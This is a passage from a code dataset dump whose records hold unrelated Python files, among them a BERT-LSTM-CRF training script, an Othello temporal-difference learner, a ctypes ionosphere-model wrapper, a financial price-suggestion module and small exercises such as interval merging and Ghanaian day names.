config.rnn_hidden, config.rnn_layer, dropout_ratio=config.dropout_ratio, dropout1=config.dropout1, use_cuda=config.use_cuda)\r\n if config.load_model:\r\n assert config.load_path is not None\r\n model = load_model(model, name=config.load_path)\r\n if config.use_cuda:\r\n model.cuda()\r\n # train model\r\n print('begin training.')\r\n model.train()\r\n optimizer = getattr(optim, config.optim)\r\n optimizer = optimizer(model.parameters(), lr=config.lr, weight_decay=config.weight_decay)\r\n eval_loss = 10000\r\n for epoch in tqdm.tqdm(range(config.base_epoch)):\r\n for i, batch in tqdm.tqdm(enumerate(train_loader)):\r\n model.zero_grad()\r\n inputs, masks, tags = batch\r\n inputs, masks, tags = Variable(inputs), Variable(masks), Variable(tags)\r\n masks = masks.bool()\r\n if config.use_cuda:\r\n inputs, masks, tags = inputs.cuda(), masks.cuda(), tags.cuda()\r\n feats = model(inputs, masks)\r\n loss = model.loss(feats, masks, tags)\r\n loss.backward()\r\n optimizer.step()\r\n # save best model\r\n dev_loss_temp = evaluate(model, dev_loader, epoch, config)\r\n if dev_loss_temp < eval_loss:\r\n print('dev loss: ', eval_loss, ' -> ', dev_loss_temp)\r\n eval_loss = dev_loss_temp\r\n save_model(model, epoch)\r\n return model\r\n\r\n\r\ndef test(config=None, model=None):\r\n \"\"\"Test Model in test file\"\"\"\r\n # load config\r\n if not config:\r\n config = Config()\r\n print('settings:\\n', config)\r\n # load corpus\r\n print('loading corpus')\r\n vocab = load_vocab(config.vocab)\r\n label_dic = load_vocab(config.tri_id_label_file)\r\n tagset_size = len(label_dic)\r\n # load test dataset\r\n test_data = read_corpus_tr_id(config.tri_id_test_file, max_length=config.max_length, label_dic=label_dic, vocab=vocab)\r\n test_ids = torch.LongTensor([temp[0] for temp in test_data])\r\n test_masks = torch.LongTensor([temp[1] for temp in test_data])\r\n test_tags = torch.LongTensor([temp[2] for temp in test_data])\r\n test_dataset = TensorDataset(test_ids, test_masks, test_tags)\r\n test_loader = DataLoader(test_dataset, shuffle=False, batch_size=config.batch_size)\r\n # load trained model\r\n if not model:\r\n model = BertLstmCrf(config.bert_path, tagset_size, 
config.bert_embedding, config.rnn_hidden, config.rnn_layer, dropout_ratio=config.dropout_ratio, dropout1=config.dropout1, use_cuda=config.use_cuda)\r\n model = load_model(model, name=config.load_path)\r\n if config.use_cuda:\r\n model.cuda()\r\n # evaluate model in test file\r\n print('begin predicting')\r\n evaluate(model, test_loader, 0, config, True)\r\n\r\n\r\ndef predict(config=None, model=None, sent=None):\r\n \"\"\"\r\n Input: raw sentences saved in config.input_file or sent\r\n Output: results of trigger identification saved in config.tri_id_result_file\r\n format: sentence ||| tag (BIO)\r\n \"\"\"\r\n # load config\r\n if not config:\r\n config = Config()\r\n\r\n vocab = load_vocab(config.vocab)\r\n label_dic = load_vocab(config.tri_id_label_file)\r\n tagset_size = len(label_dic)\r\n # load trained model\r\n if not model:\r\n model = BertLstmCrf(config.bert_path, tagset_size, config.bert_embedding, config.rnn_hidden, config.rnn_layer,\r\n dropout_ratio=config.dropout_ratio, dropout1=config.dropout1, use_cuda=config.use_cuda)\r\n model = load_model(model, name=config.load_path)\r\n if config.use_cuda:\r\n model.cuda()\r\n # begin predicting\r\n if (not config.input_file) and sent:\r\n # preprocess sent\r\n sent = sent.lower()\r\n tokens = sent.split()\r\n tokens = tokens[0:min(config.max_length-2, len(tokens))]\r\n tokens_f = ['[CLS]'] + tokens + ['[SEP]']\r\n input_ids = torch.LongTensor([[int(vocab[i]) if i in vocab else int(vocab['[UNK]']) for i in tokens_f]])\r\n input_masks = torch.LongTensor([[1] * len(input_ids[0])])\r\n if config.use_cuda and torch.cuda.is_available():\r\n input_ids, input_masks = input_ids.cuda(), input_masks.cuda()\r\n # predict tags\r\n with torch.no_grad():\r\n feats = model(input_ids, input_masks)\r\n path_score, best_path = model.crf(feats, input_masks)\r\n pred_label = best_path[0].cpu().numpy().tolist()\r\n pred_label = [list(label_dic.keys())[int(x)] for x in pred_label[1:-1]]\r\n return pred_label\r\n else:\r\n with open(config.input_file, 'r', encoding='utf-8') as f:\r\n sents = f.readlines()\r\n data = []\r\n for line in sents:\r\n line = line.lower()\r\n tokens = line.split()\r\n tokens = tokens[0:min(config.max_length - 2, len(tokens))]\r\n tokens_f = ['[CLS]'] + tokens + ['[SEP]']\r\n input_ids = [int(vocab[i]) if i in vocab else int(vocab['[UNK]']) for i in tokens_f]\r\n input_masks = [1] * len(input_ids)\r\n while len(input_ids) < config.max_length:\r\n input_ids.append(0)\r\n input_masks.append(0)\r\n data.append((input_ids, input_masks))\r\n ids = torch.LongTensor([temp[0] for temp in data])\r\n masks = torch.LongTensor([temp[1] for temp in data])\r\n dataset = TensorDataset(ids, masks)\r\n loader = DataLoader(dataset, shuffle=False, batch_size=config.batch_size)\r\n sents = []\r\n pred = []\r\n for i, batch in tqdm.tqdm(enumerate(loader)):\r\n inputs, masks = batch\r\n inputs, masks = Variable(inputs), Variable(masks)\r\n masks = masks.bool()\r\n\r\n # save sentences\r\n for idx in range(inputs.shape[0]):\r\n sents.append(inputs[idx][masks[idx]].cpu().numpy().tolist())\r\n\r\n # predict labels\r\n if config.use_cuda:\r\n inputs, masks = inputs.cuda(), masks.cuda()\r\n with torch.no_grad():\r\n feats = model(inputs, masks)\r\n path_score, best_path = model.crf(feats, masks.byte())\r\n\r\n # save labels\r\n for idx in range(inputs.shape[0]):\r\n pred.append(best_path[idx][masks[idx]].cpu().numpy().tolist())\r\n # save result\r\n save_results(sents, pred, config)\r\n return pred\r\n\r\n\r\ndef evaluate(model, data_loader, epoch, config, 
save_result=False):\r\n    model.eval()\r\n    eval_loss = 0\r\n    true = []  # true labels\r\n    pred = []  # predicted labels\r\n    sents = []  # sentences\r\n    length = 0\r\n    for i, batch in tqdm.tqdm(enumerate(data_loader)):\r\n        inputs, masks, tags = batch\r\n        length += inputs.size(0)\r\n        inputs, masks, tags = Variable(inputs), Variable(masks), Variable(tags)\r\n        masks = masks.bool()\r\n\r\n        # save sentences\r\n        for idx in range(inputs.shape[0]):\r\n            sents.append(inputs[idx][masks[idx]].cpu().numpy().tolist())\r\n\r\n        if config.use_cuda:\r\n            inputs, masks, tags = inputs.cuda(), masks.cuda(), tags.cuda()\r\n        feats = model(inputs, masks)\r\n        path_score, best_path = model.crf(feats, masks.byte())\r\n        loss = model.loss(feats, masks, tags)\r\n        eval_loss += loss.item()\r\n\r\n        # save labels\r\n        for idx in range(inputs.shape[0]):\r\n            pred.append(best_path[idx][masks[idx]].cpu().numpy().tolist())\r\n            true.append(tags[idx][masks[idx]].cpu().numpy().tolist())\r\n    # evaluate model's performance in data loader\r\n    label_dic = load_vocab(config.tri_id_label_file)\r\n    label_dic = dict(zip(label_dic.values(), label_dic.keys()))\r\n    gold_num, predict_num, correct_num = 0, 0, 0\r\n    for idx, tag in enumerate(pred):\r\n        pred_tag = [label_dic[int(x)] for x in pred[idx]]\r\n        true_tag = [label_dic[int(x)] for x in true[idx]]\r\n        new_gold_num, new_predict_num, new_correct_num = evaluate_sent(true_tag, pred_tag)\r\n        gold_num += new_gold_num\r\n        predict_num += new_predict_num\r\n        correct_num += new_correct_num\r\n    precision = correct_num / predict_num if predict_num else 0\r\n    recall = correct_num / gold_num if gold_num else 0\r\n    f_score = (2 * precision * recall) / (precision + recall) if precision + recall else 0\r\n    print('Gold Num: ', gold_num, ' Pred Num: ', predict_num, ' Corr Num: ', correct_num)\r\n    print('Precision: ', precision, ' Recall: ', recall, ' F-score: ', f_score)\r\n    # save result\r\n    if save_result:\r\n        save_results(sents, pred, config)\r\n    # return loss\r\n    print('eval epoch: {}| loss: {}'.format(epoch, eval_loss/length))\r\n    model.train()\r\n    return eval_loss\r\n\r\n\r\ndef save_results(sents, pred, config, path=None):\r\n    vocab = []\r\n    label_dic = load_vocab(config.tri_id_label_file)\r\n    label_dic = dict(zip(label_dic.values(), label_dic.keys()))\r\n    with open(config.vocab, \"r\", encoding=\"utf-8\") as reader:\r\n        while True:\r\n            token = reader.readline()\r\n            if not token:\r\n                break\r\n            token = token.strip()\r\n            vocab.append(token)\r\n    if not path:\r\n        path = config.tri_id_result_file\r\n    with open(path, 'w', encoding='utf-8') as f:\r\n        readable_sents = []\r\n        readable_preds = []\r\n        for idx in range(len(sents)):\r\n            readable_sents.append([vocab[w] for w in sents[idx][1:-1]])\r\n            readable_preds.append([label_dic[int(x)] for x in pred[idx][1:-1]])\r\n        for idx in range(len(readable_sents)):\r\n            f.write(' '.join(readable_sents[idx]))\r\n            f.write('|||')\r\n            f.write(' '.join(readable_preds[idx]))\r\n            f.write('\\n')\r\n\r\n\r\ndef evaluate_sent(true_tag, predict_tag):\r\n    gold_num = 0\r\n    predict_num = 0\r\n    correct_num = 0\r\n    sent_len = len(true_tag)\r\n    start_flag = False\r\n    equal_flag = True\r\n\r\n    for i in range(sent_len):\r\n        gold_num = gold_num + 1 if 'B' in true_tag[i] else gold_num\r\n        predict_num = predict_num + 1 if 'B' in predict_tag[i] else predict_num\r\n        if 'B' in true_tag[i]:\r\n            start_flag = True\r\n        if start_flag and true_tag[i] != predict_tag[i]:\r\n            equal_flag = False\r\n        if start_flag and ((i < sent_len - 1 and 'I' not in true_tag[i+1]) or i == sent_len - 1):\r\n            start_flag = 
False\r\n        if equal_flag and ((i < sent_len - 1 and 'I' not in predict_tag[i+1]) or i == sent_len - 1):\r\n            correct_num += 1\r\n            equal_flag = True\r\n    return gold_num, predict_num, correct_num\r\n\r\n\r\nif __name__ == '__main__':\r\n    parser = argparse.ArgumentParser()\r\n    parser.add_argument('--do-train', action='store_true',\r\n                        help='Whether to retrain the model.')\r\n    parser.add_argument('--do-eval', action='store_true',\r\n                        help='Whether to perform evaluation.')\r\n    args = parser.parse_args()\r\n    if args.do_train:\r\n        train()\r\n    if args.do_eval:\r\n        test()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"web/utils/tri_id.py","file_name":"tri_id.py","file_ext":"py","file_size_in_byte":12737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} {"seq_id":"153785691","text":"from question1 import Array\nfrom timeit import Timer\nfrom memory_profiler import profile\n\n#The beginning of Qn2\nclass SubArray(Array):\n    @profile\n    def add(self, values):\n        print(\"***QUESTION 2***\")\n        values.append(34)\n        print(\"WE HAVE ADDED 34 IN THE ARRAY: \" , values)\n\n    @profile\n    def delete(self, values):\n        values.remove(9)\n        print(\"9 WAS REMOVED FROM THE ARRAY. THE NEW ARRAY IS: \" , values)\n        print(\"\")\n\n# Third Question\n    #Check if a value is in an array\n    @profile\n    def check(self, values):\n        print(\"***QUESTION 3***\")\n        if 5 in values:\n            contains = True\n            print(contains)\n        else:\n            print(\"none\")\n\n    #Reversing an array\n    @profile\n    def reverse(self,values):\n        print(\"THE REVERSE IS: \")\n        for i in reversed(values):\n            print(i)\n\n    # Adding an item to a specific location\n    @profile\n    def insertion(self, values):\n        values.insert(3, 76)\n        print(values)\n        print(\"\")\n\nif __name__=='__main__':\n    t = Timer(\"SubArray\", \"from __main__ import SubArray\")\n    print(\"This is the Runtime for this program: \" , t.timeit())\n","sub_path":"question2_3.py","file_name":"question2_3.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} {"seq_id":"532292432","text":"import csv\r\nimport pandas as pd\r\npath_no_backedge=pd.DataFrame(pd.read_csv('finished-paths-back.csv'))\r\n\r\ndata_file = open('percentage-paths-back.csv', 'w+',newline='',encoding='utf-8')\r\ncsv_writer = csv.writer(data_file)\r\nheader=['Equal_Length','Larger_by_1','Larger_by_2','Larger_by_3','Larger_by_4','Larger_by_5','Larger_by_6'\r\n    ,'Larger_by_7','Larger_by_8','Larger_by_9','Larger_by_10','Larger_by_more_than_10']\r\ncsv_writer.writerow([header[0],header[1],header[2],header[3],header[4],header[5],header[6],header[7],header[8],header[9],header[10],header[11]])\r\n\r\ntotal_count=0\r\ncount_same=0\r\ncount_remaining=[0,0,0,0,0,0,0,0,0,0,0]\r\n#print(path_no_backedge.iloc[0]['human path length'])\r\n\r\nfor i in range(len(path_no_backedge)):\r\n    if path_no_backedge.iloc[i]['Shortest_Path_Length']=='NA':\r\n        continue\r\n    diff=int(path_no_backedge.iloc[i]['Human_Path_Length'])-int(path_no_backedge.iloc[i]['Shortest_Path_Length'])\r\n    total_count+=1\r\n    if diff==0:\r\n        count_same+=1\r\n    elif diff >=1 and diff <=10:\r\n        count_remaining[diff-1]+=1\r\n    else:\r\n        count_remaining[10]+=1\r\ncsv_writer.writerow([round((count_same/total_count)*100,2),round((count_remaining[0]/total_count)*100,2),round((count_remaining[1]/total_count)*100,2),\r\n                     round((count_remaining[2] / total_count) * 100, 2),round((count_remaining[3]/total_count)*100,2),round((count_remaining[4]/total_count)*100,2),\r\n                     
round((count_remaining[5]/total_count)*100,2),round((count_remaining[6]/total_count)*100,2),round((count_remaining[7]/total_count)*100,2),\r\n                     round((count_remaining[8]/total_count)*100,2),round((count_remaining[9]/total_count)*100,2),round((count_remaining[10]/total_count)*100,2)\r\n                     ])\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"percentage-paths-back.py","file_name":"percentage-paths-back.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} {"seq_id":"99254404","text":"# -*- coding: utf-8 -*-\n\nfrom jsresource import JSResource\n\nDEFAULT_LANGUAGE = 'en'\n\nfile_strings = JSResource(\n    'files/',\n    fallback_dictionary = DEFAULT_LANGUAGE\n)\n\nwforms = JSResource(\n    'wforms/',\n    fallback_dictionary = DEFAULT_LANGUAGE\n)\n\nfallback_strings_1 = JSResource(\n    'fallback_strings_1/',\n    fallback_dictionary = DEFAULT_LANGUAGE\n)\n\nfallback_strings_2 = JSResource(\n    'fallback_strings_2/',\n    fallback_dictionary = DEFAULT_LANGUAGE\n)\n\nstrings = JSResource(\n    'strings/',\n    fallback_dictionary = DEFAULT_LANGUAGE,\n    fallback_resources = [wforms, fallback_strings_1, fallback_strings_2]\n)\n\nfor language in 'en', 'ru':\n    print('\\nfor', language, 'file:')\n\n    print(file_strings[language]('html.index'))\n    print(file_strings[language]('html.templates.first_template'))\n    print(file_strings[language]('html.templates.second_template'))\n\n    # directly defined strings redefine nested strings\n    print(file_strings[language]('image.1'))\n    print(file_strings[language]('image.2'))\n    print(file_strings[language]('image.3'))\n\n    print(strings[language]('messages.hero.i_found_n_items', message_from = 'First hero', n = 12, hero_sex = 'm'))\n    print(strings[language]('messages.hero.i_found_n_items', message_from = 'Second hero', n = 21, hero_sex = 'f'))\n    print(strings[language]('messages.hero.i_found_n_items', message_from = 'Third hero', n = 1, hero_sex = 'n'))\n\n    print(strings[language]('fallback_string_1'))\n    print(strings[language]('fallback_string_2'))\n\n    # resolve (sub)dictionary to json string\n    print(strings[language].resolve_json('interface'))\n    print(file_strings[language].resolve_json(''))\n","sub_path":"example/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} {"seq_id":"556203848","text":"from flask import jsonify, request\n\ndef echo_get():\n    name = request.args.get('name', '').strip()\n    msg = {\"msg\": \"Hello \" + name} if name else {\"msg\": \"Hello\"}\n    return jsonify(msg)\n\ndef echo_post():\n    if 'name' in request.form:\n        name = request.form['name']\n    else:\n        name = ''\n    msg = {\"msg\": \"Hello \" + name} if name else {\"msg\": \"Hello\"}\n    return jsonify(msg)\n","sub_path":"REST/swagger_tutorial_2/swagger.py","file_name":"swagger.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} {"seq_id":"504571515","text":"# Copyright (C) 2017 Boston College\n# http://www.bostoncollege.edu\n#\n# BC Proprietary Information\n#\n# US Government retains Unlimited Rights\n# Non-Government Users – restricted usage as defined through\n# licensing with STR or via arrangement with Government.\n#\n# In no event shall the initial developers or copyright holders be\n# liable for any damages whatsoever, including - but not restricted\n# to - lost revenue or profits or other direct, indirect, special,\n# incidental or consequential 
damages, even if they have been\n# advised of the possibility of such damages, except to the extent\n# invariable law, if any, provides otherwise.\n#\n# The Software is provided AS IS with NO\n# WARRANTY OF ANY KIND, INCLUDING THE WARRANTY OF DESIGN,\n# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.\n\nimport platform\nimport unittest\nimport numpy\nimport collections\nimport os\nimport ctypes as C\nfrom ctypes import cdll\nimport Shared.Utils.HfgeoLogger as Logger\n\nlogger = Logger.getLogger()\n\n## @package IonoModelEngine\n# Python interface to FOUT1\n\n## The interface class to IrtamPyIface\n# Contains an instance of the C interface library\n#\nclass IrtamPyIface:\n\n ## Constructor sets up all the handle\n #\n def __init__(self):\n\n # Figure out which os this is on so that we can load the correct library\n #\n libName = os.path.join(os.path.dirname(os.path.realpath(__file__)),'lib')\n if platform.system() == 'Darwin':\n libName = os.path.join(libName,'libirtampy_mac.dylib')\n elif platform.system() == 'Linux':\n libName = os.path.join(libName,'libirtampy_lin.so')\n \n self.libhandle = cdll.LoadLibrary( libName )\n self.libhandle.processirtam.argtypes = C.POINTER(C.c_double), \\\n C.POINTER(C.c_double), \\\n C.POINTER(C.c_double), \\\n C.POINTER(C.c_double), \\\n C.POINTER(C.c_double), \\\n C.POINTER(C.c_double), \\\n C.POINTER(C.c_double)\n \n self.irtamInput = collections.namedtuple('processirtam_input', \\\n 'alati, along, xmodip, hourut, tov, param, param_local')\n\n def __del__(self):\n import _ctypes\n logger.warning('IrtamPyIface Destructor')\n _ctypes.dlclose(self.libhandle._handle)\n\n ## Return a named tuple object that represent the input to sao reader.\n # For example: \n # param_local, irtam_tov = processirtam(irtamInput)\n # \n # @retval irtamInput A named tuple that the user need to fill in and pass to procesirtam()\n #\n def getIrtamInput(self):\n return self.irtamInput\n\n ## Call processirtam in the lib \n #\n # @param irtamInput - The named tuple input to getprofile\n #\n # @retval param_local, irtam_tov - IRTAM coefficients and Time of Validity\n # \n def processirtam(self, irtamInput):\n\n # Convert from python type to c type\n #\n alati = C.byref(C.c_double(irtamInput.alati))\n along = C.byref(C.c_double(irtamInput.along))\n xmodip = C.byref(C.c_double(irtamInput.xmodip))\n hourut = C.byref(C.c_double(irtamInput.hourut))\n tov = C.byref(C.c_double(irtamInput.tov))\n param = irtamInput.param.ctypes.data_as(C.POINTER(C.c_double))\n param_local = C.c_double(irtamInput.param_local) \n\n # Calling the C interface\n #\n self.libhandle.processirtam(alati, \\\n along, \\\n xmodip, \\\n hourut, \\\n tov, \\\n param,\\\n param_local)\n \n return param_local.value\n\nclass UnitTest_IrtamPyIface(unittest.TestCase):\n\n def test_irtam(self):\n\n iface = IrtamPyIface()\n\n\t # Get the Input object so we can fill it out\n\t #\n irtamInput = iface.getIrtamInput()\n irtamInput.alati = 32.42\n irtamInput.along = 253.71\n irtamInput.xmodip = 25.0\n irtamInput.hourut = 12.\n irtamInput.tov = 12.\n irtamInput.param = numpy.zeros(1064)\n logger.info(irtamInput.param[0:10])\n\n irtamfile = os.path.dirname(os.path.abspath(__file__)) + '/test_data/IRTAM_hmF2_COEFFS_20140119_1545.ASC' \n data = numpy.genfromtxt(irtamfile)\n irtamInput.param = numpy.reshape(data,1064)\n logger.info(irtamInput.param[0:10])\n irtamInput.param_local = numpy.zeros(1)\n (param_local) = iface.processirtam(irtamInput)\n logger.info(param_local)\n\nif __name__ == \"__main__\":\n logger.setLevel('INFO')\n 
unittest.main()\n \n\n\n\n\n\n\n\n\n","sub_path":"call-04/Send_RIPE/IonoModelEngine/IRTAM/IrtamPyIface.py","file_name":"IrtamPyIface.py","file_ext":"py","file_size_in_byte":4868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"257905470","text":"\n\n\"\"\"----------------------------------------------------------------------------\nMODULE\n FSuggestPriceTemplate - Module that handles the suggested price for \n the underlying instrument when trading Repo/Reverse and SecurityLoan. \n The suggested price is the market dirty price rounded to 2 decimals. \n\n (c) Copyright 2011 by SunGard FRONT ARENA. All rights reserved.\n\nRENAME this module to FSuggestPrice.\n\n----------------------------------------------------------------------------\"\"\"\nimport ael\nimport acm\n\ndef suggest_undprice(trade):\n\n if not trade.insaddr:\n print ('No instrument found')\n return 0\n \n if not trade.insaddr.und_insaddr:\n print ('No underlying instrument found')\n return 0\n\n context = acm.GetDefaultContext()\n sheet_type = 'FDealSheet'\n calc_space = acm.Calculations().CreateCalculationSpace( context, sheet_type) \n\n marketPrice_ColumnId = 'Instrument Market Price'\n marketPriceDirty_ColumnId = 'Instrument Market Price Dirty'\n fromQ_ColumnId = 'Standard Calculations From Quote'\n theorPrice_ColumnId = 'Standard Calculations Price Theor'\n fromQtn_ColumnId = 'Standard Calculations From Quotation'\n quote_ColumnId = 'Standard Calculations Quote To Quote'\n quoteDay_ColumnId = 'Standard Calculations From Quote Value Date'\n \n trd = acm.FTrade[trade.trdnbr]\n undIns = acm.FInstrument[trade.insaddr.und_insaddr.insid]\n round = acm.GetFunction('round', 3)\n\n if trade.insaddr.instype == 'BuySellback':\n price = calc_space.CreateCalculation( undIns, marketPrice_ColumnId ).Value().Number()\n if not acm.Math.IsFinite( price ):\n price = calc_space.CreateCalculation( undIns, theorPrice_ColumnId ).Value().Number()\n price = round(price, 2, 'Normal')\n else: \n price = calc_space.CreateCalculation( undIns, marketPriceDirty_ColumnId ).Value().Number()\n if not acm.Math.IsFinite( price ):\n price = calc_space.CreateCalculation( undIns, theorPrice_ColumnId ).Value().Number()\n calc_space.SimulateValue( undIns, marketPrice_ColumnId, price )\n price = calc_space.CreateCalculation( undIns, marketPriceDirty_ColumnId ).Value().Number()\n calc_space.RemoveSimulation( undIns, marketPrice_ColumnId )\n\n price = round(price, 2, 'Normal') \n calc_space.SimulateValue( undIns, fromQ_ColumnId, price )\n calc_space.SimulateValue( undIns, fromQtn_ColumnId, 'Pct of Nominal') \n day = trd.ValueDay()\n calc_space.SimulateValue( undIns, quoteDay_ColumnId, day ) \n price = calc_space.CreateCalculation( undIns, quote_ColumnId ).Value().Number() \n calc_space.RemoveSimulation( undIns, fromQ_ColumnId )\n calc_space.RemoveSimulation( undIns, fromQtn_ColumnId )\n calc_space.RemoveSimulation( undIns, quoteDay_ColumnId )\n\n return price\n\n","sub_path":"Extensions/REMod/FPythonCode/FSuggestPriceTemplate.py","file_name":"FSuggestPriceTemplate.py","file_ext":"py","file_size_in_byte":2898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"89651377","text":"# lib of temporal difference learning for othello\r\nimport ModifiedBench.Function as Function\r\nimport ModifiedBench.Comparator as Comparator\r\nimport ModifiedBench.pso as pso\r\nimport math\r\nimport random\r\nimport numpy as np\r\nimport copy\r\nimport Problem\r\nimport 
matplotlib.pyplot as plt\r\nimport Othello\r\n\r\nnpop = 10\r\nps = 100\r\npn = \"othello\"\r\n\r\n\r\ndef cprint(cond,text):\r\n if cond:\r\n print(text)\r\n\r\ndef tdl_othello():\r\n max_games = 1e6\r\n games = 0\r\n # strategy representation-WPC\r\n othello = Problem.Problem()\r\n othello.instantiate(pn)\r\n player = Othello.Player()\r\n player.initialize_weight(othello.xlb,othello.xub) # strategy weight matrix\r\n print(player.w)\r\n # while games < max_games:\r\n pass\r\n\r\n\r\n\r\ndef test_selfplay(weight):\r\n # self-play othello\r\n othello = Problem.Problem()\r\n othello.instantiate(pn)\r\n state = Othello.State()\r\n state.is_end()\r\n player = Othello.Player()\r\n player.w = copy.deepcopy(weight) # strategy weight matrix\r\n while not state.end:\r\n # self-play begins\r\n print(\"round\",state.round,\"turn\", state.turn)\r\n skip, state = player.act(state, update_strategy=False) # black player moves, symbol = 1\r\n state.turn = - state.turn # switch to white player strategy\r\n player.symbol = state.turn\r\n print(\"round\", state.round, \"turn\", state.turn)\r\n skip, state = player.act(state, update_strategy=False) # white player moves, symbol = -1\r\n state.turn = - state.turn # switch to black player strategy\r\n player.symbol = state.turn\r\n state.round += 1\r\n if state.end:\r\n if state.winner == 1:\r\n print(\"Black wins.\")\r\n elif state.winner == -1:\r\n print(\"White wins.\")\r\n else:\r\n print(\"End with a draw\")\r\n\r\n\r\ndef test_tdl(verbose=0):\r\n max_games = 3e6\r\n games = 0\r\n best_players = []\r\n # strategy representation-WPC\r\n othello = Problem.Problem()\r\n othello.instantiate(pn)\r\n player = Othello.Player()\r\n player.initialize_weight(othello.xlb, othello.xub) # strategy weight matrix\r\n # training process\r\n while games < max_games:\r\n if games % (max_games / 20) == 0:\r\n best_players.append(copy.deepcopy(player))\r\n print(\"game\",games)\r\n state = Othello.State()\r\n state.is_end()\r\n while not state.end:\r\n # self-play begins\r\n cprint(verbose == 1, \"round \"+str(state.round)+\" turn \"+str(state.turn))\r\n skip, state = player.act(state, display=False) # black player moves, symbol = 1\r\n state.turn = - state.turn # switch to white player strategy\r\n player.symbol = state.turn\r\n cprint(verbose == 1, \"round \"+str(state.round)+\" turn \"+str(state.turn))\r\n skip, state = player.act(state, display=False) # white player moves, symbol = -1\r\n state.turn = - state.turn # switch to black player strategy\r\n player.symbol = state.turn\r\n state.round += 1\r\n # print(np.round(player.w,2))\r\n if state.end and verbose == 1:\r\n if state.winner == 1:\r\n print(\"Black wins.\")\r\n elif state.winner == -1:\r\n print(\"White wins.\")\r\n elif state.winner == 0:\r\n print(\"End with a draw\")\r\n else:\r\n print(\"Invalid winner!\")\r\n games += 1\r\n print(\"Training is over.\")\r\n print(\"Saving the strategy.\")\r\n np.save(\"./Data/weight_mat/tdl_weight.npy\", player.w)\r\n\r\n\r\nif __name__ == '__main__':\r\n # test_tdl()\r\n data = np.load(\"./Data/opt_process/s0.npy\")\r\n player = Othello.Player()\r\n player.load_weight(data)\r\n print(np.round(player.w, 2))\r\n # test_vs_random_opponents([player],oppo_size=1)\r\n Othello.test_vs_fixed_opponent(player, Othello.hp)\r\n","sub_path":"TDL.py","file_name":"TDL.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"238636773","text":"# Definition for an interval.\nclass Interval:\n def 
__init__(self, s=0, e=0):\n        self.start = s\n        self.end = e\n\nclass Solution:\n\n    def union(self, interval_a, interval_b):\n        return Interval(interval_a.start, max(interval_a.end, interval_b.end))\n\n    def is_intersected(self, interval_a, interval_b):\n        if interval_a.start <= interval_b.start <= interval_a.end:\n            return True\n        else:\n            return False\n\n    def insert(self, intervals, newInterval):\n        intervals.append(newInterval)\n        intervals = sorted(intervals, key=lambda x: (x.start, -x.end))\n        result = []\n        tmp_interval = None\n        for interval in intervals:\n            if tmp_interval is None:\n                tmp_interval = Interval(interval.start, interval.end)\n                continue\n            if self.is_intersected(tmp_interval, interval):\n                tmp_interval = self.union(tmp_interval, interval)\n            else:\n                result.append(Interval(tmp_interval.start, tmp_interval.end))\n                tmp_interval = Interval(interval.start, interval.end)\n        if tmp_interval:\n            result.append(tmp_interval)\n        return result\n","sub_path":"51-100/57.py","file_name":"57.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} {"seq_id":"264359490","text":"#AWS_Restart\n#Ghanaian Names Days Of The Week\n#Daniel Nii Amu Dodoo\n\n#Populating the days of the week in an array\n\ndaysOfWeek = []\n\nprefixes = ['first', 'second', 'third', 'fourth', 'fifth', 'sixth', 'seventh']\n\nwhile len(daysOfWeek) < 7:\n    for prefix in prefixes:\n        day = input('Enter the ' + prefix + \" day of the week:\")\n        daysOfWeek.append(day.capitalize())\n        print(daysOfWeek)\n\n        if daysOfWeek.count(day.capitalize()) > 1:\n            daysOfWeek.pop()\n            day = input('Enter the ' + prefix + \" day of the week again:\")\n            daysOfWeek.append(day.capitalize())\n            print(daysOfWeek)\n\n    \n#User inputs sex and day born\nsex_Male_Female = input(\"Enter Your Sex, Male or Female:\")\nday_Born = input(\"Enter the day of the week you were born:\")\n\n\n#Compares users inputs to days \nif sex_Male_Female == \"Male\" and day_Born == \"Monday\":\n    print(\"Kwadwo\")\nelif sex_Male_Female == \"Female\" and day_Born == \"Monday\":\n    print(\"Ajua\")\n\nif sex_Male_Female == \"Male\" and day_Born == \"Tuesday\":\n    print(\"Kwabena\")\n\nelif sex_Male_Female == \"Female\" and day_Born == \"Tuesday\":\n    print(\"Abena\")\n\nif sex_Male_Female == \"Male\" and day_Born == \"Wednesday\":\n    print(\"Kwaku\")\n\nelif sex_Male_Female == \"Female\" and day_Born == \"Wednesday\":\n    print(\"Akua\")\n\nif sex_Male_Female == \"Male\" and day_Born == \"Thursday\":\n    print(\"Yaw\")\n\nelif sex_Male_Female == \"Female\" and day_Born == \"Thursday\":\n    print(\"Yaa\")\n\nif sex_Male_Female == \"Male\" and day_Born == \"Friday\":\n    print(\"Kofi\")\n\nelif sex_Male_Female == \"Female\" and day_Born == \"Friday\":\n    print(\"Afia\")\n\nif sex_Male_Female == \"Male\" and day_Born == \"Saturday\":\n    print(\"Kwame\")\n\nelif sex_Male_Female == \"Female\" and day_Born == \"Saturday\":\n    print(\"Ama\")\n\nif sex_Male_Female == \"Male\" and day_Born == \"Sunday\":\n    print(\"Kwesi\")\n\nelif sex_Male_Female == \"Female\" and day_Born == \"Sunday\":\n    print(\"Esi\")\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Loops_Daniel_Updated.py","file_name":"Loops_Daniel_Updated.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} {"seq_id":"21764221","text":"from flask import 